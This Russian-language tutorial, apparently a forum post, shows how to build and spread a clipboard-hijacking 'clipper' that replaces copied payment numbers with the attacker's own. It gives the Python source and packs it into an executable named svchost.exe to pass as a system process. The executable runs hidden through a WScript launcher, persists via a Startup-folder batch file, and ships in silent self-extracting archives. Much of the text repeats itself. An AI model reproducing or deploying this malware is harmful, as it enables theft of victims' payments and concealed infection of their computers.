Клиппер - программа, которая выполняет функцию подмены кошельков в буфере обмена. Во время оплаты, клиппер подменяет скопированные юзером адреса электронных кошельков и подменяет их на ваши.
Сразу напишу что для этого понадобится python 3.5 Скачать
* Скачиваем,устанавливаем тут нечего сложного обязательно поставьте галочку чтоб питон добавили в Patch, далее выходим из системы чтоб всё сохранилось
входим обратно нажимаем win+R прописываем туда cmd и нажимаем ок.
В консоли проверяем установился ли у нас питон командой python если у нас выдало информацию о версии питона, то всё норм если же нет то вы не поставили галочку напротив Patch, далее пишем в консоли:
Ждём установки, потом если не выдало ошибок пишем:
Проверяем всё ли установилось командой
Далее открываем сам Python нажимаем файл, новый проект и вставляем код:
Код (Python):
Далее сохраняем всё это в папку с нашим питоном и опять идём к консоли.
В консоли заходим в папку где лежит file.ру и пишем команду
И все! (параметр -F создает один файл).
Появился наш .ехе файл в папке с питоном в папке dist это и есть наша основа вируса (проверьте всё ли работает должным образом).
Далее создаем на рабочем столе папку называем как угодно и кидаем туда наш .ехе файл создаём текстовый документ, открываем и вставляем туда код который будет запускать наш .ехе скрытно:
не забудьте переименовать наш .ехе в svchost.exe (как назовёте .ехе такой и будет процесс в диспетчере).
Когда вставили код нажимаем сохранить как и сохраняем с названием star2t и расширением js после сохранения у нас должен появится файл star2t.js, теперь создаём ещё один текстовый документ который будет отвечать за запуск нашего файла после перезагрузки пк вставляем туда код:
star2t.js это путь куда я буду распаковывать файлы вируса у вас он может быть другой.
Теперь сохраняем как наш текстовик с названием start и расширением .bat после сохранения должен получится файл start.bat, выделяем файлы svchost.exe и star2t.js и создаём sfx архив с путём распаковки C:\LocalStorage\win32\drivers
Обязательно ставим галочки на пунктах скрыть всё и перезапись без подтверждения
всё в графу инсталл ничего не вписываем Далее выделяем файл start.bat и тоже создаём sfx архив в путь уже прописываем
И тоже ставим галочки на против скрыть всё и перезапись без подтверждения но уже прописываем в графе инсталл start.bat чтоб после распаковки он у нас запустился.
Выделяем два наших sfx архива и тоже делаем из них тоже sfx архив, путь распаковки
Галочки напротив спрятать всё и перезапись без последствий в инсталл прописываем запуск наших двух sfx архивов сначала с вирусом потом с батником можете ставить иконку вирус готов.
Сразу напишу что для этого понадобится python 3.5 Скачать
* Скачиваем,устанавливаем тут нечего сложного обязательно поставьте галочку чтоб питон добавили в Patch, далее выходим из системы чтоб всё сохранилось
входим обратно нажимаем win+R прописываем туда cmd и нажимаем ок.
В консоли проверяем установился ли у нас питон командой python если у нас выдало информацию о версии питона, то всё норм если же нет то вы не поставили галочку напротив Patch, далее пишем в консоли:
Python:
pip install pyperclip
Python:
pip install pyinstaller
Python:
pip list
Код (Python):
Python:
import pyperclip
import time
while True:
num = pyperclip.paste()
c = 0
for i in num:
try:
int(i)
c += 1
except ValueError:
pass
if [s for s in num if s in '+']:
if int(c)==12:
pyperclip.copy("+3807********")
time.sleep(3)
if [s for s in num if s in '+']:
if int(c)==11:
pyperclip.copy("+790********")
time.sleep(3)
elif int(c)==12:
pyperclip.copy("3807********")
time.sleep(3)
elif int(c)==11:
pyperclip.copy("790********")
time.sleep(3)
В консоли заходим в папку где лежит file.ру и пишем команду
Python:
pyinstaller -F имя_файла.ру
Появился наш .ехе файл в папке с питоном в папке dist это и есть наша основа вируса (проверьте всё ли работает должным образом).
Далее создаем на рабочем столе папку называем как угодно и кидаем туда наш .ехе файл создаём текстовый документ, открываем и вставляем туда код который будет запускать наш .ехе скрытно:
PHP:
var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("svchost.exe",0);
Когда вставили код нажимаем сохранить как и сохраняем с названием star2t и расширением js после сохранения у нас должен появится файл star2t.js, теперь создаём ещё один текстовый документ который будет отвечать за запуск нашего файла после перезагрузки пк вставляем туда код:
PHP:
echo off
cd C:\LocalStorage\win32\drivers
star2t.js
C:\LocalStorage\win32\drivers
Теперь сохраняем как наш текстовик с названием start и расширением .bat после сохранения должен получится файл start.bat, выделяем файлы svchost.exe и star2t.js и создаём sfx архив с путём распаковки C:\LocalStorage\win32\drivers
Обязательно ставим галочки на пунктах скрыть всё и перезапись без подтверждения
всё в графу инсталл ничего не вписываем Далее выделяем файл start.bat и тоже создаём sfx архив в путь уже прописываем
PHP:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Выделяем два наших sfx архива и тоже делаем из них тоже sfx архив, путь распаковки
PHP:
C:\LocalStorage\win32\drivers